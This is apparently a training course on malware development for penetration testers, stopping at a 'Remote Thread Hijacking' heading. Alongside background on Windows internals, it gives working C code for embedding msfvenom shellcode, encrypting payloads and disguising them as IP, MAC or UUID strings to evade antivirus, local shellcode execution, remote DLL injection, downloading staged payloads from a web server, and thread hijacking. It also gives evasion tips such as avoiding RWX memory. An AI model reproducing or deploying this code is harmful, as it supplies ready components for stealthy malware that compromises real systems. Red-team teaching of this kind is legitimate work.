Malware Development Fundamentals
QA210 — From Windows API foundations to advanced EDR bypass techniques
Figure (Malware Development Lifecycle): Build & refine → Bug hunting → Local testing → Cloud testing → Indicators
Overview
Malware is software designed to carry out malicious actions, such as gaining unauthorized access to a computer or stealing sensitive data. The term is usually associated with illegal or criminal activity, but ethical hackers such as penetration testers and red team members also use malware during authorized security assessments of an organization.
From an offensive security perspective, testers have three main options for the tools used in an assessment: open-source tools (OSTs), which security vendors identify quickly; commercial tools, which are closed-source and have a better chance of bypassing security solutions; and custom tools, which security vendors have not yet analyzed or fingerprinted, giving the attacking team the greatest advantage. This is why knowledge of malware development is crucial for a successful offensive security assessment.
Why Choose C?
Any programming language can be used to create malware, including Python, PowerShell, C#, C++, and Go. C stands out for several reasons: compiled native code is harder to reverse engineer than interpreted or managed code; the binary has no runtime prerequisites on the target system (unlike Python, which needs an interpreter); the resulting file is compact; and C offers fine-grained control when interacting with the operating system. Higher-level languages are more abstracted from the OS, use memory less efficiently, and give less overall control because they hide complex functionality behind abstractions. A low-level language like C lets developers interact with the operating system in detail and gives them more freedom in how they use it.
Malware Development Lifecycle (MDLC)
The Malware Development Lifecycle (MDLC) is a customized version of the Software Development Lifecycle (SDLC) with five main phases: (1) Development: build new functionality or refine existing functionality; (2) Testing: find and fix bugs; (3) Offline AV/EDR testing: run the malware against as many security products as possible without network connectivity; (4) Online AV/EDR testing: run it against cloud-connected security products; and (5) IoC analysis: analyze the malware and extract its Indicators of Compromise. After phase 5, the process loops back to phase 1 for continuous improvement.
Online AV/EDR testing may result in your malware being submitted to security vendors and added to their databases. Always test offline first, and exercise caution when testing online.
Required Tools
| Tool | Purpose |
|---|---|
| Visual Studio | Primary C/C++ development environment |
| x64dbg | Open-source debugger for Windows x64/x86 binaries |
| PE-Bear | PE structure analysis; view imports/exports |
| Process Hacker 2 | View and control processes, loaded DLLs, and memory regions |
| Msfvenom | Shellcode payload generation |
| VMware / VirtualBox | Virtualization environment for testing |
| Windows SDK | Windows development headers and libraries |
Foundational Knowledge
Windows Architecture
A processor running Windows operates in one of two modes: user mode and kernel mode. Applications run in user mode, and core operating system components run in kernel mode. When an application needs to perform a privileged task such as creating a file, it cannot do so directly. Only the kernel can complete the task, so the request passes through a sequence of layers that this course calls the Function Call Flow (FCF).
The main components of the Windows architecture are: user processes, the programs the user runs (Notepad, Chrome); subsystem DLLs, which contain the API functions that user processes call (kernel32.dll, user32.dll, advapi32.dll); ntdll.dll, a system-wide DLL at the lowest layer of user mode that performs the transition from user mode to kernel mode, and whose exported functions are commonly called the Native API (NTAPI); and the executive and kernel, which run in kernel mode and call drivers and other kernel-mode modules.
Function Call Flow (FCF)
The FCF process begins when a user application calls a WinAPI function (e.g., CreateFile in kernel32.dll). This DLL then calls the equivalent NTAPI function (NtCreateFile in ntdll.dll). Next, ntdll.dll executes a system call instruction (sysenter on x86 or syscall on x64) to transition to kernel mode. In kernel mode, the system service dispatcher invokes the kernel's NtCreateFile, which works with drivers and other modules to complete the request.
Applications can also call NTAPI functions in ntdll.dll directly, skipping the WinAPI layer, because the WinAPI is largely a wrapper around the Native API. Doing so is harder, however, because most of the Native API is not officially documented by Microsoft.
Virtual Memory & Paging
In modern operating systems, processes do not address physical RAM directly. Instead, they use virtual addresses that the operating system maps to physical memory. Virtual memory is built on paging: memory is divided into fixed-size pages, 4 KB each on x86/x64. A page is in one of three states: free (neither reserved nor committed, available for allocation), reserved (a range of the address space set aside for later use, with no physical storage behind it yet), or committed (backed by physical memory or the paging file, so it can be accessed).
Common page protection constants: PAGE_NOACCESS (all access disabled), PAGE_READONLY (read-only access), PAGE_READWRITE (read and write), PAGE_EXECUTE_READ (read and execute), and PAGE_EXECUTE_READWRITE (read, write, and execute; highly discouraged).
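A quick worked example of page granularity: when VirtualAlloc is called with a NULL base address, it rounds the requested size up to the next page boundary, so a 5000-byte request commits two 4 KB pages (8192 bytes). The sketch below does the same arithmetic. The hardcoded 4096 is an assumption matching x86/x64; real code should read dwPageSize from GetSystemInfo. RoundUpToPage and PagesNeeded are hypothetical helper names.

```c
#include <stddef.h>
#include <assert.h>

/* Assumed page size: 4 KB, the standard page size on x86/x64 Windows.
   Production code should read SYSTEM_INFO.dwPageSize from GetSystemInfo(). */
#define PAGE_SIZE_4K ((size_t)4096)

/* The bit trick below only works for power-of-two page sizes. */
static_assert((PAGE_SIZE_4K & (PAGE_SIZE_4K - 1)) == 0,
              "page size must be a power of two");

/* Round a byte count up to the next multiple of the page size. */
size_t RoundUpToPage(size_t cb) {
    return (cb + PAGE_SIZE_4K - 1) & ~(PAGE_SIZE_4K - 1);
}

/* Number of whole pages needed to hold cb bytes. */
size_t PagesNeeded(size_t cb) {
    return RoundUpToPage(cb) / PAGE_SIZE_4K;
}
```

A size that is already page-aligned (4096) stays the same, and any extra byte pulls in a whole additional page.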
Memory Protection
Two important memory protection mechanisms: DEP (Data Execution Prevention) — prevents code execution in memory regions that do not have the execute flag; and ASLR (Address Space Layout Randomization) — randomly arranges the address space positions of key data areas, including the base of the executable and the positions of the stack, heap, and libraries.
Windows API
The Windows API provides many specialized data types beyond common ones like int and float. Key data types include:
| Data Type | Description | Example |
|---|---|---|
| HANDLE | Handle to a kernel object (file, process, event) | HANDLE hFile = CreateFile(...); |
| DWORD | Unsigned 32-bit integer | DWORD dwBytesRead; |
| LPVOID | Generic pointer (void*) | LPVOID pMemory = VirtualAlloc(...); |
| LPSTR / LPWSTR | Pointer to an ANSI / Unicode (UTF-16) string; LPCSTR / LPCWSTR are the const versions | LPCSTR buf = "Hello"; |
| BOOL | Integer holding TRUE or FALSE | BOOL bResult = DeleteFile(...); |
| HMODULE | Handle to a loaded module (DLL/EXE) | HMODULE hMod = GetModuleHandle(...); |
ANSI vs Unicode
Most Windows API functions that take strings come in two versions, ending in "A" (ANSI) or "W" (wide, Unicode). For example, CreateFileA takes an LPCSTR (a string of 8-bit chars) and CreateFileW takes an LPCWSTR (a string of 16-bit UTF-16 code units). The sizes differ accordingly: char str[] = "qa210" occupies 6 bytes (5 characters plus the null terminator), while wchar_t str[] = L"qa210" occupies 12 bytes, because wchar_t is 2 bytes on Windows and the terminator is 2 bytes as well.
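To see the size difference concretely, the sketch below measures both literals. It substitutes C11's char16_t for wchar_t: wchar_t is 2 bytes on Windows but 4 bytes on Linux, whereas char16_t is 2 bytes on common platforms, so the numbers match Windows. Utf16ByteLength is a hypothetical helper, similar in spirit to lstrlenW multiplied by the character size.

```c
#include <assert.h>
#include <string.h>
#include <uchar.h>

/* On Windows, wchar_t is 16 bits (UTF-16), so L"qa210" occupies 12 bytes.
   char16_t is used here so the sizes match Windows on any platform. */
const char     AnsiStr[] = "qa210";   /* 5 chars + '\0'            = 6 bytes  */
const char16_t WideStr[] = u"qa210";  /* 6 code units x 2 bytes    = 12 bytes */

/* Byte length of a UTF-16 string, excluding the terminator. */
size_t Utf16ByteLength(const char16_t* s) {
    size_t n = 0;
    while (s[n] != 0) {
        n++;
    }
    return n * sizeof(char16_t);
}
```

The same 5-character string needs 5 bytes of content in ANSI but 10 in UTF-16, which matters whenever a buffer size is passed in bytes rather than characters.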
In/Out Parameters & Error Handling
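Windows API prototypes mark parameters as IN (input) or OUT (output); these macros expand to nothing and serve only as documentation. OUT parameters are passed by pointer so the function can write results back to the caller. For error handling, WinAPI functions signal failure through their return value, and GetLastError() returns the extended error code; NTAPI functions return an NTSTATUS, which is checked with the NT_SUCCESS() macro. Always check return values: for example, CreateFileW returns INVALID_HANDLE_VALUE on failure.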
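NT_SUCCESS works because an NTSTATUS is a signed 32-bit value whose top two bits encode severity (0 success, 1 informational, 2 warning, 3 error), so success and informational codes are non-negative. The sketch below re-creates the macro portably so it compiles outside Windows. NTSTATUS_T and NtSeverity are hypothetical stand-ins; on Windows the WDK headers define NT_SUCCESS, and user-mode code often defines it itself.

```c
#include <assert.h>
#include <stdint.h>

/* Stand-in for NTSTATUS, which Windows defines as a signed 32-bit LONG. */
typedef int32_t NTSTATUS_T;

/* Same logic as the Windows definition: a status is a success if it is
   non-negative when viewed as a signed 32-bit value. Converting codes
   such as 0xC0000022 to int32_t wraps to a negative value on mainstream
   compilers. */
#define NT_SUCCESS(Status) (((NTSTATUS_T)(Status)) >= 0)

/* Severity lives in the top two bits. */
unsigned NtSeverity(uint32_t status) {
    return status >> 30;
}

/* A few well-known values from ntstatus.h. */
#define STATUS_SUCCESS          0x00000000u
#define STATUS_PENDING          0x00000103u  /* informational-range success */
#define STATUS_BUFFER_OVERFLOW  0x80000005u  /* warning */
#define STATUS_ACCESS_DENIED    0xC0000022u  /* error */
```

Note that warnings such as STATUS_BUFFER_OVERFLOW fail the NT_SUCCESS check even though they are not errors, so code that expects a warning must test for that specific value.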
Portable Executable (PE) Format
PE is the executable file format on Windows, including EXE, DLL, and SYS. Understanding PE structure is a critical foundation for malware development because it allows you to understand how malware is loaded into memory, how imports/exports work, and how to perform injection techniques.
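Important PE components: the DOS Header begins with the magic value "MZ" (0x5A4D when read as a little-endian WORD) and contains e_lfanew, the file offset of the NT Headers. The NT Headers begin with the signature "PE\0\0" and contain the File Header, which holds the target machine, the number of sections, and a timestamp, followed by the Optional Header, which holds AddressOfEntryPoint (the entry point RVA), ImageBase (the preferred load address), and DataDirectory, an array of 16 entries pointing to tables such as the Export Table, Import Table, and Resource Table. The section headers follow the Optional Header.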
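The header chain above can be walked with plain offset arithmetic. The sketch below validates "MZ", follows e_lfanew, checks the "PE\0\0" signature, and reads a few File Header and Optional Header fields from an in-memory file image. It reads little-endian fields by hand so it runs outside Windows; on Windows you would normally cast to IMAGE_DOS_HEADER and IMAGE_NT_HEADERS from winnt.h instead. PE_SUMMARY and ParsePeHeaders are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Little-endian readers (PE fields are always little-endian). */
static uint16_t ReadU16(const uint8_t* p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t ReadU32(const uint8_t* p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

typedef struct {
    uint32_t e_lfanew;          /* file offset of the NT headers        */
    uint16_t Machine;           /* 0x8664 = x64, 0x14C = x86            */
    uint16_t NumberOfSections;
    uint16_t OptionalMagic;     /* 0x10B = PE32, 0x20B = PE32+ (64-bit) */
} PE_SUMMARY;

/* Returns 1 and fills *out if buf looks like a PE file, otherwise 0. */
int ParsePeHeaders(const uint8_t* buf, size_t len, PE_SUMMARY* out) {
    if (len < 0x40 || ReadU16(buf) != 0x5A4D)          /* "MZ" */
        return 0;
    uint32_t lfanew = ReadU32(buf + 0x3C);             /* e_lfanew */
    /* Need signature (4) + File Header (20) + Optional Header magic (2). */
    if (lfanew > len || len - lfanew < 4 + 20 + 2)
        return 0;
    if (memcmp(buf + lfanew, "PE\0\0", 4) != 0)
        return 0;
    const uint8_t* fileHdr = buf + lfanew + 4;
    out->e_lfanew = lfanew;
    out->Machine = ReadU16(fileHdr + 0);
    out->NumberOfSections = ReadU16(fileHdr + 2);
    out->OptionalMagic = ReadU16(fileHdr + 20);        /* first field after File Header */
    return 1;
}
```

The bounds checks matter: e_lfanew comes from the file itself, so a malformed or truncated file must not be allowed to push reads past the buffer.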
Dynamic-Link Library (DLL)
A DLL is a library containing code and data that can be used by multiple programs simultaneously. DLLs have an entry point DllMain that is called when the DLL is loaded/unloaded:
#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        // Runs when the DLL is loaded into a process
        break;
    case DLL_THREAD_ATTACH:
        // Runs when the process creates a new thread
        break;
    case DLL_THREAD_DETACH:
        // Runs when a thread exits cleanly
        break;
    case DLL_PROCESS_DETACH:
        // Runs when the DLL is unloaded
        break;
    }
    return TRUE;
}
To export a function from a DLL, mark it with __declspec(dllexport). A DLL can be loaded in two ways: load-time dynamic linking, where the program links against the DLL's import library (.lib) and the Windows loader maps the DLL when the process starts; and run-time dynamic linking, where the program calls LoadLibraryA/W and then GetProcAddress. Run-time linking is more common in malware because functions resolved this way do not appear in the IAT, although LoadLibrary and GetProcAddress themselves still do.
AV Malware Detection Mechanisms
Understanding how AV detects malware is the foundation for building bypass techniques. The main mechanisms include:
Signature-based detection: a known byte sequence such as FC 48 83 E4 F0 E8 C0 00 00 00 can be identified as an msfvenom payload. Bypass: avoid hardcoded values, encrypt payloads, and retrieve values dynamically.
Payload Placement
As a malware developer, you have several choices for where to store the payload within a PE file. Depending on this choice, the payload will reside in a different section of the PE file, affecting read/write capabilities and the level of detection by AV.
.data Section
The .data section contains initialized global and static variables. It is readable and writable (RW), which suits encrypted payloads that must be decrypted in place at runtime. A payload stored in an initialized global or static array is placed in .data; a local array, by contrast, lives on the stack, and the compiler may keep its initial bytes in .rdata or encode them directly in instructions.
// .data saved payload - read/write, suitable for encrypted payloads
unsigned char Data_RawData[] = {
0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00,
0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xD2
// ... msfvenom shellcode
};
int main() {
printf("[i] Data_RawData var : 0x%p \n", Data_RawData);
// Can modify directly since .data is R/W
return 0;
}
.rdata Section
Global variables declared with the const keyword are placed in .rdata (read-only data). Because the section is read-only, any attempt to modify its contents at runtime causes an access violation. Linker settings (for example, MSVC's /MERGE option) can merge .rdata into .data or even into .text. Use .rdata for payloads that do not need in-place decryption; if in-place decryption is required, either change the memory protection first or copy the payload into a writable buffer.
Payloads can also be stored in any custom section using the pragma directive: #pragma section(".mysec", execute, read, write). This helps avoid signature detection based on inspecting .data/.rdata sections.
Payload Encryption
Payload Encryption is a technique used to hide code within a malicious file, making detection more difficult for security solutions. Encryption helps malware remain undetected for longer periods. However, the more data that is encrypted in a file, the higher the file's entropy — which can cause security solutions to flag the file as suspicious. The three most common encryption algorithms in malware development are XOR, RC4, and AES.
XOR Encryption
XOR is the simplest encryption algorithm, suitable for small payloads. Three levels of increasing complexity:
#include <windows.h>

// Method 1: XOR with a single-byte key (only 256 possible keys, trivial to brute force)
VOID XorByOneKey(IN PBYTE pShellcode, IN SIZE_T sShellcodeSize, IN BYTE bKey) {
    for (SIZE_T i = 0; i < sShellcodeSize; i++) {
        pShellcode[i] = pShellcode[i] ^ bKey;
    }
}
// Method 2: XOR with (key + index). The effective key byte changes with each
// position, but there are still only 256 possible starting keys.
VOID XorByiKeys(IN PBYTE pShellcode, IN SIZE_T sShellcodeSize, IN BYTE bKey) {
    for (SIZE_T i = 0; i < sShellcodeSize; i++) {
        pShellcode[i] = pShellcode[i] ^ (BYTE)(bKey + i);
    }
}
// Method 3: XOR with a repeating multi-byte key (key space grows with key length)
VOID XorByInputKey(IN PBYTE pShellcode, IN SIZE_T sShellcodeSize,
                   IN PBYTE bKey, IN SIZE_T sKeySize) {
    for (SIZE_T i = 0, j = 0; i < sShellcodeSize; i++, j++) {
        if (j >= sKeySize) {
            j = 0; // wrap around to the start of the key
        }
        pShellcode[i] = pShellcode[i] ^ bKey[j];
    }
}
XOR should be used for small payloads (e.g., obfuscating strings). For larger payloads, use AES or RC4 for stronger security and resistance to brute force attacks.
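XOR is its own inverse: applying the same key twice restores the original bytes, which is why one function serves for both encryption and decryption. The sketch below restates Method 3 with standard C types (unsigned char, size_t) instead of PBYTE/SIZE_T so it compiles outside Windows; XorWithKey is a hypothetical name.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Repeating multi-byte key XOR, equivalent to Method 3 above.
   The modulo wraps the key index instead of resetting a second counter. */
void XorWithKey(unsigned char* data, size_t dataLen,
                const unsigned char* key, size_t keyLen) {
    assert(keyLen > 0);
    for (size_t i = 0; i < dataLen; i++) {
        data[i] ^= key[i % keyLen];
    }
}
```

For example, with the key {0x13, 0x37, 0xAB}, the first byte of "attack at dawn" ('a', 0x61) becomes 0x61 ^ 0x13 = 0x72; a second call with the same key turns it back into 'a'.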
RC4 Encryption
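RC4 is a fast, simple stream cipher, and it is symmetric: the same function both encrypts and decrypts. RC4 first runs the Key Scheduling Algorithm (KSA) to initialize a 256-byte state array from the key, then uses the Pseudo-Random Generation Algorithm (PRGA) to produce a keystream that is XORed with the data. Because the PRGA modifies the state array as it runs, decryption must start from a state freshly initialized with the same key.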
// RC4 Key Scheduling Algorithm (KSA)
void rc4_init(unsigned char* key, int keylen, unsigned char* S) {
    int i, j = 0;
    for (i = 0; i < 256; i++) {
        S[i] = i;
    }
    for (i = 0; i < 256; i++) {
        j = (j + S[i] + key[i % keylen]) % 256;
        // Swap S[i] and S[j]
        unsigned char temp = S[i];
        S[i] = S[j];
        S[j] = temp;
    }
}
// RC4 Pseudo-Random Generation Algorithm (PRGA)
void rc4_crypt(unsigned char* S, unsigned char* data, int datalen) {
    int i = 0, j = 0, k;
    for (k = 0; k < datalen; k++) {
        i = (i + 1) % 256;
        j = (j + S[i]) % 256;
        // Swap S[i] and S[j]
        unsigned char temp = S[i];
        S[i] = S[j];
        S[j] = temp;
        // Generate a keystream byte and XOR it into the data
        int t = (S[i] + S[j]) % 256;
        data[k] ^= S[t];
    }
}
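Because rc4_crypt consumes the state array, a decryption pass needs a fresh rc4_init with the same key. The sketch below restates the two functions with const-correct parameters and size_t lengths, adds a hypothetical wrapper Rc4Apply that initializes a fresh state on every call, and can be checked against the widely published test vector: key "Key" and plaintext "Plaintext" produce BB F3 16 E8 D9 40 AF 0A D3.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* KSA: initialize the 256-byte state from the key. */
void rc4_init(const unsigned char* key, size_t keylen, unsigned char S[256]) {
    assert(keylen > 0);
    for (int i = 0; i < 256; i++) {
        S[i] = (unsigned char)i;
    }
    for (int i = 0, j = 0; i < 256; i++) {
        j = (j + S[i] + key[i % keylen]) & 0xFF;
        unsigned char t = S[i]; S[i] = S[j]; S[j] = t;   /* swap */
    }
}

/* PRGA: generate the keystream and XOR it into data (encrypts or decrypts). */
void rc4_crypt(unsigned char S[256], unsigned char* data, size_t datalen) {
    int i = 0, j = 0;
    for (size_t k = 0; k < datalen; k++) {
        i = (i + 1) & 0xFF;
        j = (j + S[i]) & 0xFF;
        unsigned char t = S[i]; S[i] = S[j]; S[j] = t;   /* swap */
        data[k] ^= S[(S[i] + S[j]) & 0xFF];
    }
}

/* Hypothetical wrapper: a fresh state per call, so calling it twice
   with the same key restores the original data. */
void Rc4Apply(const unsigned char* key, size_t keylen,
              unsigned char* data, size_t datalen) {
    unsigned char S[256];
    rc4_init(key, keylen, S);
    rc4_crypt(S, data, datalen);
}
```

Keeping the state local to the wrapper avoids the common bug of reusing an already-advanced state array for decryption, which silently produces garbage.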
Never hardcode keys directly in source code. Keys can be discovered during reverse engineering. All of the following key representations are detectable: unsigned char* key = "qa210";, unsigned char key[] = {0x71, 0x61, 0x32, ...};, or unsigned char key[] = {'q','a','2','1','0'};. Instead, generate keys at runtime or use a derivation method.
AES Encryption
AES (Advanced Encryption Standard) is the strongest of the three algorithms and is suitable for large payloads. The tiny-AES-c library provides a lightweight implementation of AES-128/192/256. AES is a block cipher with a 16-byte block size and can be used in modes such as CBC, CTR, and ECB. In CBC and ECB modes, tiny-AES-c does not pad the data, so buffer lengths must be a multiple of 16 bytes.
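// Using tiny-AES-c to decrypt a payload (AES-CBC)
// The key size is selected at compile time by defining AES128, AES192, or AES256 (see aes.h)
#include <stddef.h>
#include <stdint.h>
#include "aes.h"

// Hypothetical wrapper; the buffer is decrypted in place
void DecryptPayload(uint8_t* encryptedPayload, size_t payloadSize) {
    struct AES_ctx ctx;
    uint8_t key[16] = { 0 }; // 16-byte key for AES-128, derived at runtime
    uint8_t iv[16] = { 0 };  // 16-byte IV, derived at runtime
    // Initialize AES context with key and IV
    AES_init_ctx_iv(&ctx, key, iv);
    // payloadSize must be a multiple of AES_BLOCKLEN (16)
    AES_CBC_decrypt_buffer(&ctx, encryptedPayload, payloadSize);
}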
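Because tiny-AES-c leaves padding to the caller in CBC mode, data must be padded to a whole number of 16-byte blocks before encryption, and the padding must be stripped after decryption. PKCS#7 is a common choice: it always appends 1 to 16 bytes, each holding the pad length. The sketch below shows that scheme; Pkcs7PaddedSize, Pkcs7Pad, and Pkcs7Unpad are hypothetical helpers, not part of tiny-AES-c.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BLOCK_LEN 16  /* AES block size (AES_BLOCKLEN in tiny-AES-c) */

/* Size after PKCS#7 padding: always adds between 1 and 16 bytes. */
size_t Pkcs7PaddedSize(size_t len) {
    return len + (BLOCK_LEN - (len % BLOCK_LEN));
}

/* Pad buf in place; buf must have room for Pkcs7PaddedSize(len) bytes.
   Returns the padded length. */
size_t Pkcs7Pad(uint8_t* buf, size_t len) {
    size_t padded = Pkcs7PaddedSize(len);
    uint8_t padByte = (uint8_t)(padded - len);
    memset(buf + len, padByte, padByte);
    return padded;
}

/* Validate the padding and return the unpadded length,
   or (size_t)-1 if the padding is malformed. */
size_t Pkcs7Unpad(const uint8_t* buf, size_t len) {
    if (len == 0 || len % BLOCK_LEN != 0) return (size_t)-1;
    uint8_t padByte = buf[len - 1];
    if (padByte == 0 || padByte > BLOCK_LEN) return (size_t)-1;
    for (size_t i = len - padByte; i < len; i++) {
        if (buf[i] != padByte) return (size_t)-1;
    }
    return len - padByte;
}
```

A 5-byte input pads to 16 bytes with eleven 0x0B bytes, and an input that is already 16 bytes gains a full extra block, so the unpadding step is never ambiguous.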
Payload Obfuscation
Obfuscation is a technique for hiding payloads by transforming them into different formats (IPv4, IPv6, MAC addresses, UUIDs) to avoid signature detection. The payload is converted into strings that appear legitimate, and is only restored to its original form at runtime. These techniques help reduce entropy and make payloads look like normal data during static analysis.
IPv4/IPv6 Fuscation
Transforms the payload into IPv4 or IPv6 address strings. Every 4 bytes of shellcode become one IPv4 address, one byte per octet; for example, the bytes FC 48 83 E4 become 252.72.131.228. For IPv6, every 16 bytes of shellcode become one IPv6 address, so each entry carries more data.
// IPv4 Deobfuscation - convert IPv4 strings back to shellcode
BOOL Ipv4Deobfuscation(IN CHAR* Ipv4Array[], IN SIZE_T NmbrOfElements,
OUT PBYTE* ppDAddress, OUT SIZE_T* pDSize) {
PBYTE pBytes = (PBYTE)HeapAlloc(GetProcessHeap(), 0, NmbrOfElements * 4);
if (!pBytes) return FALSE;
for (SIZE_T i = 0; i < NmbrOfElements; i++) {
// inet_addr converts "A.B.C.D" to 4 bytes
*(DWORD*)(pBytes + i * 4) = inet_addr(Ipv4Array[i]);
}
*ppDAddress = pBytes;
*pDSize = NmbrOfElements * 4;
return TRUE;
}
MAC Fuscation
Similar to IPv4, but transforms the payload into MAC addresses. Every 6 bytes of shellcode become one MAC address. The sscanf function with format string "%02hhx:%02hhx:%02hhx:%02hhx:%02hhx:%02hhx" is used to parse MAC addresses back into bytes.
UUID Fuscation
Every 16 bytes of shellcode are represented as a UUID (e.g., FC4883E4-F0E8-C000-0000-4151-41505251). Use UuidFromStringA from the WinAPI to convert a UUID string back into 16 binary bytes. This is a powerful technique because UUIDs look completely legitimate in source code and have a fixed size of 16 bytes per entry.
// UUID Deobfuscation
BOOL UuidDeobfuscation(IN CONST RPC_CSTR UuidArray[], IN SIZE_T NmbrOfElements,
OUT PBYTE* ppDAddress, OUT SIZE_T* pDSize) {
PBYTE pBytes = (PBYTE)HeapAlloc(GetProcessHeap(), 0, NmbrOfElements * 16);
if (!pBytes) return FALSE;
for (SIZE_T i = 0; i < NmbrOfElements; i++) {
// UuidFromStringA converts UUID string to 16 bytes
if (RPC_S_OK != UuidFromStringA((RPC_CSTR)UuidArray[i],
(UUID*)(pBytes + i * 16))) {
return FALSE;
}
}
*ppDAddress = pBytes;
*pDSize = NmbrOfElements * 16;
return TRUE;
}
Local Payload Execution
Shellcode Injection (Local)
The process of executing shellcode in the current process consists of the following main steps: allocate a memory region with VirtualAlloc, write the payload to that region, change memory protection if needed, create a thread to execute, and free the memory when done.
// Local Shellcode Injection - basic process
BOOL RunShellcode(IN PBYTE pShellcode, IN SIZE_T sSizeOfShellcode) {
// 1. Allocate RW memory region
PVOID pAddress = VirtualAlloc(NULL, sSizeOfShellcode,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
if (!pAddress) return FALSE;
// 2. Write payload to memory region
memcpy(pAddress, pShellcode, sSizeOfShellcode);
// 3. Change protection to RX (executable)
DWORD dwOldProtection = 0;
if (!VirtualProtect(pAddress, sSizeOfShellcode,
PAGE_EXECUTE_READ, &dwOldProtection))
return FALSE;
// 4. Execute payload using CreateThread
HANDLE hThread = CreateThread(NULL, 0,
(LPTHREAD_START_ROUTINE)pAddress,
NULL, 0, NULL);
if (!hThread) return FALSE;
// 5. Wait for thread to complete
WaitForSingleObject(hThread, INFINITE);
// 6. Free memory
VirtualFree(pAddress, 0, MEM_RELEASE);
CloseHandle(hThread);
return TRUE;
}
Using PAGE_EXECUTE_READWRITE (RWX) is a major red flag for AV/EDR. Always use the RW → Write → RX flow instead of directly allocating RWX memory. Allocating RWX memory is one of the most suspicious behaviors that security solutions monitor.
DLL Injection (Process Injection)
DLL Injection is the technique of inserting a DLL into a running process. The process: open a handle to the target process with OpenProcess, allocate memory in the target process with VirtualAllocEx, write the DLL path with WriteProcessMemory, and create a remote thread that calls LoadLibraryA using CreateRemoteThread.
// DLL Injection into a remote process
BOOL InjectDll(IN DWORD dwPid, IN const char* dllPath) {
// 1. Open handle to target process
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
if (!hProcess) return FALSE;
// 2. Allocate memory in target process
SIZE_T sSize = strlen(dllPath) + 1;
PVOID pAddress = VirtualAllocEx(hProcess, NULL, sSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
if (!pAddress) { CloseHandle(hProcess); return FALSE; }
// 3. Write DLL path to target process
if (!WriteProcessMemory(hProcess, pAddress, dllPath, sSize, NULL)) {
CloseHandle(hProcess); return FALSE;
}
// 4. Find LoadLibraryA address
HMODULE hKernel32 = GetModuleHandleW(L"kernel32.dll");
pfnLoadLibraryA pLoadLibraryA = (pfnLoadLibraryA)
GetProcAddress(hKernel32, "LoadLibraryA");
// 5. Create remote thread calling LoadLibraryA
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0,
(LPTHREAD_START_ROUTINE)pLoadLibraryA,
pAddress, 0, NULL);
if (!hThread) { CloseHandle(hProcess); return FALSE; }
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
CloseHandle(hProcess);
return TRUE;
}
Shellcode Injection (Remote)
Remote Shellcode Injection is similar to DLL Injection, but instead of writing a DLL path and calling LoadLibraryA, you write shellcode directly into the target process and create a remote thread to execute at the shellcode address. This technique is more flexible because it does not require a DLL file on disk.
Staging
Staging is the technique of storing payloads at an external source (web server, Windows Registry) rather than embedding them directly in the binary. This helps reduce the executable file size, lower entropy, and allows updating payloads without recompiling. Staging is particularly useful when payloads are large or when you need to change payloads between executions.
Web Server Staging
Uses the WinINet API (InternetOpenW, InternetOpenUrlW, InternetReadFile) to download payloads from a remote server. The process: initialize a WinINet session, open the URL, read the data, and close handles. Payload size can be determined dynamically by reading until no more data is available.
// Download payload from a web server
BOOL DownloadPayload(IN LPCWSTR url, OUT PBYTE* ppBuffer, OUT SIZE_T* pSize) {
HINTERNET hInternet = InternetOpenW(L"Mozilla/5.0",
INTERNET_OPEN_TYPE_DIRECT,
NULL, NULL, 0);
if (!hInternet) return FALSE;
HINTERNET hUrl = InternetOpenUrlW(hInternet, url, NULL, 0,
INTERNET_FLAG_SECURE, 0);
if (!hUrl) { InternetCloseHandle(hInternet); return FALSE; }
// Dynamic payload size - read until no more data
DWORD dwBytesRead = 0;
SIZE_T totalSize = 0;
BYTE tempBuffer[4096];
PBYTE pBuffer = NULL;
while (InternetReadFile(hUrl, tempBuffer, sizeof(tempBuffer), &dwBytesRead)
&& dwBytesRead > 0) {
pBuffer = (PBYTE)HeapReAlloc(GetProcessHeap(), 0, pBuffer,
totalSize + dwBytesRead);
memcpy(pBuffer + totalSize, tempBuffer, dwBytesRead);
totalSize += dwBytesRead;
}
*ppBuffer = pBuffer;
*pSize = totalSize;
InternetCloseHandle(hUrl);
InternetCloseHandle(hInternet);
return TRUE;
}
Windows Registry Staging
The Windows Registry can be used as a payload storage location. Advantages: no network connection required, payloads are stored persistently on the system. Use RegOpenKeyExW, RegSetValueExW, and RegGetValueW to write and read payloads from the Registry. Conditional compilation (#ifdef) can be used to create two separate binaries: one to stage the payload into the Registry, and one to read and execute it.
Thread Hijacking
Thread Hijacking is a technique that takes control of a running thread to execute malicious code instead of creating a new thread. The main advantage over CreateThread/CreateRemoteThread is that no new thread is created — this helps avoid detection by security solutions that monitor thread creation. The technique works by suspending a thread, changing its context (specifically the instruction pointer RIP/EIP) to point to the shellcode, and then resuming the thread.
Local Thread Hijacking
// Local Thread Hijacking
BOOL HijackThread(IN HANDLE hThread, IN PVOID pAddress) {
// 1. Suspend the thread
SuspendThread(hThread);
// 2. Get thread context
CONTEXT ctx = { .ContextFlags = CONTEXT_FULL };
if (!GetThreadContext(hThread, &ctx)) {
ResumeThread(hThread);
return FALSE;
}
// 3. Change instruction pointer (RIP on x64)
ctx.Rip = (DWORD64)pAddress;
// 4. Set the new thread context
if (!SetThreadContext(hThread, &ctx)) {
ResumeThread(hThread);
return FALSE;
}
// 5. Resume thread - will execute from the new address
ResumeThread(hThread);
return TRUE;
}
Remote Thread Hijacking
